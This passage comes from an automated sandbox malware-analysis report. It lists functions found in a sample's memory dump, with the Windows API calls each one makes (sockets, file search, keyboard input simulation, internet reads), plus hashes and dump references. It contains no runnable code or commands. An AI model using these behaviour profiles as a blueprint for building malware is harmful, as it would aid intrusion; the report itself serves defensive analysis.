                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1300846289-0
                                                                                                                              • Opcode ID: 897c279bce6071158e51afaeaa4ba8bc5094495ee8eaa61ddb52fcecc148d698
                                                                                                                              • Instruction ID: 7e997cf5fd815ebd2fe21e6465d8a4e032d2f3ca7671f5e9c0ca01d1a65cde84
                                                                                                                              • Opcode Fuzzy Hash: 897c279bce6071158e51afaeaa4ba8bc5094495ee8eaa61ddb52fcecc148d698
                                                                                                                              • Instruction Fuzzy Hash: 7202AF70A00209EFCF08DF65D885AAEB7B5EF98300F55C069F80ADB255EB31DA55CB91
                                                                                                                              Function 001C96E2 Relevance: 7.6, APIs: 5, Instructions: 146networkCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 001CACD3: inet_addr.WS2_32(00000000), ref: 001CACF5
                                                                                                                              • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 001C973D
                                                                                                                              • WSAGetLastError.WS2_32(00000000,00000000), ref: 001C9760
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorLastinet_addrsocket
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4170576061-0
                                                                                                                              • Opcode ID: ef84316b351d76cd3c555647b6f32daa650bf40ea069b95b492e63e14f5551bc
                                                                                                                              • Instruction ID: f4954ecf8aa466c98719aacbf869acce06d658933392231b6441961662f45473
                                                                                                                              • Opcode Fuzzy Hash: ef84316b351d76cd3c555647b6f32daa650bf40ea069b95b492e63e14f5551bc
                                                                                                                              • Instruction Fuzzy Hash: AB41B071600204AFDB14AF24C886EBE77EDEF54728F14814CF956AB392DB749E418B91
                                                                                                                              Function 001BF350 Relevance: 7.6, APIs: 5, Instructions: 125fileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 001BF37A
                                                                                                                              • _wcscmp.LIBCMT ref: 001BF3AA
                                                                                                                              • _wcscmp.LIBCMT ref: 001BF3BF
                                                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 001BF3D0
                                                                                                                              • FindClose.KERNEL32(00000000,00000001,00000000), ref: 001BF3FE
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Find$File_wcscmp$CloseFirstNext
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2387731787-0
                                                                                                                              • Opcode ID: 059297aa63994f79aecd310d35091bd043faae9556c2b2bb53f91993e69c15cf
                                                                                                                              • Instruction ID: 76104fbf7acc54edd0c2072a6ba3a3abe2160434527f4273600c0d5a715c2fd7
                                                                                                                              • Opcode Fuzzy Hash: 059297aa63994f79aecd310d35091bd043faae9556c2b2bb53f91993e69c15cf
                                                                                                                              • Instruction Fuzzy Hash: D1419B356043029FCB08DF28C890AAAB3E4FF59324F10456DE95ACB3A1DB31E946CF91
                                                                                                                              Function 001B4342 Relevance: 6.1, APIs: 4, Instructions: 112keyboardwindowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 001B439C
                                                                                                                              • SetKeyboardState.USER32(00000080,?,00000001), ref: 001B43B8
                                                                                                                              • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 001B4425
                                                                                                                              • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 001B4483
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: KeyboardState$InputMessagePostSend
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 432972143-0
                                                                                                                              • Opcode ID: 8fd05b34e033b05962a2b7e8fa81b62966b2d65e48b20c90f1ddcacc7166a91e
                                                                                                                              • Instruction ID: 217dff58aaa14916b1b8e952c196e05fc5ade39fec49c13a1cc241eaba5ac7ec
                                                                                                                              • Opcode Fuzzy Hash: 8fd05b34e033b05962a2b7e8fa81b62966b2d65e48b20c90f1ddcacc7166a91e
                                                                                                                              • Instruction Fuzzy Hash: 674126B0A00258ABEF348B65D8087FDBBB5AB59311F04811AF491932D2CB748DA5D762
                                                                                                                              Function 001DEFA8 Relevance: 6.1, APIs: 4, Instructions: 80nativewindowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 0018AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0018AF8E
                                                                                                                              • GetCursorPos.USER32(?), ref: 001DEFE2
                                                                                                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,001EF3C3,?,?,?,?,?), ref: 001DEFF7
                                                                                                                              • GetCursorPos.USER32(?), ref: 001DF041
                                                                                                                              • NtdllDialogWndProc_W.NTDLL(?,0000007B,?,?,?,?,?,?,?,?,?,?,001EF3C3,?,?,?), ref: 001DF077
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Cursor$DialogLongMenuNtdllPopupProc_TrackWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1423138444-0
                                                                                                                              • Opcode ID: 14098c8bf323b10cd7a4f2271263f4c4ba21aebcf6702edfd89b4d699e231ba5
                                                                                                                              • Instruction ID: 2d9f3eba88c0de9f62099c17c778cdf2c97a3eaeb9842f850136918886b87362
                                                                                                                              • Opcode Fuzzy Hash: 14098c8bf323b10cd7a4f2271263f4c4ba21aebcf6702edfd89b4d699e231ba5
                                                                                                                              • Instruction Fuzzy Hash: 6821D635500018EFDB158F54D898EFA7BBAFF49750F14406AF506873A2C3319E92DB90
                                                                                                                              Function 001B220C Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 560stringCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • lstrlenW.KERNEL32(?,?,?,00000000), ref: 001B221E
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: lstrlen
                                                                                                                              • String ID: ($|
                                                                                                                              • API String ID: 1659193697-1631851259
                                                                                                                              • Opcode ID: 65fce9a7133bf1341389e155a37e0af80838b7f3cdc1daad57c8b1b3153948e4
                                                                                                                              • Instruction ID: e92b61cbd24c2c58cab2699114186da7756f8c82fa6950911184fb272318341e
                                                                                                                              • Opcode Fuzzy Hash: 65fce9a7133bf1341389e155a37e0af80838b7f3cdc1daad57c8b1b3153948e4
                                                                                                                              • Instruction Fuzzy Hash: C5321575A007059FCB28DF69C480AAAB7F1FF48320B15C56EE49ADB7A1E770E941CB44
                                                                                                                              Function 0018AD5C Relevance: 4.9, APIs: 3, Instructions: 378nativeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 0018AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0018AF8E
                                                                                                                              • NtdllDialogWndProc_W.NTDLL(?,?,?,?,?), ref: 0018AE5E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DialogLongNtdllProc_Window
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2065330234-0
                                                                                                                              • Opcode ID: 035dd20da5116e9799549cc4ea45f563867bc8b57864f75e9502799f8c65f641
                                                                                                                              • Instruction ID: 98a12ab5c519961b299bbabb60eabd390f05cacdc0403c5b743600f1f30edc57
                                                                                                                              • Opcode Fuzzy Hash: 035dd20da5116e9799549cc4ea45f563867bc8b57864f75e9502799f8c65f641
                                                                                                                              • Instruction Fuzzy Hash: 65A126A0104645BBFB2CBA2A5C88D7F395DEF52741B91492FF902D61A1CB248F02DB73
                                                                                                                              Function 001C550C Relevance: 4.7, APIs: 3, Instructions: 155networkfileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,001C4A1E,00000000), ref: 001C55FD
                                                                                                                              • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 001C5629
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Internet$AvailableDataFileQueryRead
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 599397726-0
                                                                                                                              • Opcode ID: e3c39ca81fa4d9c98623bb06e10085f75b059d33fadaa03c99ecc39ccd84ece4
                                                                                                                              • Instruction ID: fbc2667c60e3a9a4244a65bc860679de452eea0160cbd44d5abed1e288e50697
                                                                                                                              • Opcode Fuzzy Hash: e3c39ca81fa4d9c98623bb06e10085f75b059d33fadaa03c99ecc39ccd84ece4
                                                                                                                              • Instruction Fuzzy Hash: F241D271600609BFEB109A91DC85FBFB7BEEB60718F50406EF605A6180DB70FE819B64
                                                                                                                              Function 001BEA85 Relevance: 4.6, APIs: 3, Instructions: 72COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 001BEA95
                                                                                                                              • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 001BEAEF
                                                                                                                              • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 001BEB3C
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorMode$DiskFreeSpace
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1682464887-0
                                                                                                                              • Opcode ID: 9cbab4c5705262d306516908a50d1b240f724644091f589834cedba7d9b4c2e2
                                                                                                                              • Instruction ID: 5c9005271ae3f631f174bf97d2dcf812ca3dc0b923b8bb85fdc19658b8d6350c
                                                                                                                              • Opcode Fuzzy Hash: 9cbab4c5705262d306516908a50d1b240f724644091f589834cedba7d9b4c2e2
                                                                                                                              • Instruction Fuzzy Hash: 78213C35A00218EFCB00EFA5D895AEEBBB9FF58314F1480A9E906AB351DB31D955CB50
                                                                                                                              Function 001B702F Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 001B704C
                                                                                                                              • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 001B708D
                                                                                                                              • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 001B7098
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 33631002-0
                                                                                                                              • Opcode ID: 61adf6df82e8d9d9a527ae61e2d11b500b3778cacd9f0b01ccf02637725cb541
                                                                                                                              • Instruction ID: 1a24c1e962a0ab581146381fa13f8fbf1ff2359fad80a0942259868e1fbfca8f
                                                                                                                              • Opcode Fuzzy Hash: 61adf6df82e8d9d9a527ae61e2d11b500b3778cacd9f0b01ccf02637725cb541
                                                                                                                              • Instruction Fuzzy Hash: 3A111E71E05228BFEB109F95EC45BFEBBBDEB45B10F104156F910E7290D7705A058BA1
                                                                                                                              Function 0018AFB4 Relevance: 3.1, APIs: 2, Instructions: 82nativeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 0018AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0018AF8E
                                                                                                                                • Part of subcall function 0018B155: GetWindowLongW.USER32(?,000000EB), ref: 0018B166
                                                                                                                              • GetParent.USER32(?), ref: 001EF4B5
                                                                                                                              • NtdllDialogWndProc_W.NTDLL(?,00000133,?,?,?,?,?,?,?,?,0018ADDD,?,?,?,00000006,?), ref: 001EF52F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: LongWindow$DialogNtdllParentProc_
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 314495775-0
                                                                                                                              • Opcode ID: 07b2b5074fd06e929d8b5ef07a94ed01d1dd545b4749585272a46c27e8dbe469
                                                                                                                              • Instruction ID: 04a7a8ea90a28247d5c24eb01060e5c6f07a1a7db489735344739f64e6a55d13
                                                                                                                              • Opcode Fuzzy Hash: 07b2b5074fd06e929d8b5ef07a94ed01d1dd545b4749585272a46c27e8dbe469
                                                                                                                              • Instruction Fuzzy Hash: A1218835204944AFDB29AF29D888EAA3BB6EF05360F184265F5354B2F2D7309E52DF50
                                                                                                                              Function 001BFD47 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 001BFD71
                                                                                                                              • FindClose.KERNEL32(00000000), ref: 001BFDA1
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Find$CloseFileFirst
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2295610775-0
                                                                                                                              • Opcode ID: 348236342a39230edeec01da7bdbdc79fabab0d28215af874b49c0b4a9e48e72
                                                                                                                              • Instruction ID: 211dd4800fed53d34f48b5a6d5a95a8d1877e33113b1ec0ec5b30595f33d296e
                                                                                                                              • Opcode Fuzzy Hash: 348236342a39230edeec01da7bdbdc79fabab0d28215af874b49c0b4a9e48e72
                                                                                                                              • Instruction Fuzzy Hash: 9411AD326142009FD700EF28D849A7AB7E9FF94324F00851EF8A99B291DB30ED018B81
                                                                                                                              Function 001DF0A1 Relevance: 3.0, APIs: 2, Instructions: 46nativewindowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 0018AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0018AF8E
                                                                                                                              • NtdllDialogWndProc_W.NTDLL(?,0000002B,?,?,?,?,?,?,?,001EF352,?,?,?), ref: 001DF115
                                                                                                                                • Part of subcall function 0018B155: GetWindowLongW.USER32(?,000000EB), ref: 0018B166
                                                                                                                              • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 001DF0FB
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: LongWindow$DialogMessageNtdllProc_Send
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1273190321-0
                                                                                                                              • Opcode ID: f4ed9752acc6e9c1917f1063377267aa3754bf1adde0d0b91e7d084ea790cb20
                                                                                                                              • Instruction ID: 549c70438655c9c45ede5cd3c89dd34cded3646e4fe31cb15ee800327e62d11e
                                                                                                                              • Opcode Fuzzy Hash: f4ed9752acc6e9c1917f1063377267aa3754bf1adde0d0b91e7d084ea790cb20
                                                                                                                              • Instruction Fuzzy Hash: D901B131200214EBDB21AF14EC89F6A3FA6FF85364F140129F9164B3E1C731A953DB50
                                                                                                                              Function 001DF45A Relevance: 3.0, APIs: 2, Instructions: 32nativeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • ClientToScreen.USER32(?,?), ref: 001DF47D
                                                                                                                              • NtdllDialogWndProc_W.NTDLL(?,00000200,?,?,?,?,?,?,?,001EF42E,?,?,?,?,?), ref: 001DF4A6
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ClientDialogNtdllProc_Screen
                                                                                                                              • String ID:
